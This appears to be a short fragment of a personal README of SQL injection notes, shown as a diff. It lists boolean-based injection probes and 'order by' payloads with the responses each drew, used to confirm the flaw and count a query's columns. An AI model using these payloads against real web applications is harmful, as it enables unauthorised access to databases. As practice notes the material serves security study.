an4kein/_sql_injections/README.md

 Continue

-1 and true;-- -    out: no error
+1 and true;-- -    out: no error [Normal page]
-1 and false;-- -   out: Invalid Input parameter
+1 and false;-- -   out: Invalid Input parameter [Error page]

 1 order by 7-- -   out: error (Unknown column '7' in 'order clause')
 1 order by 5-- -   out: no error  (us have 5 columns)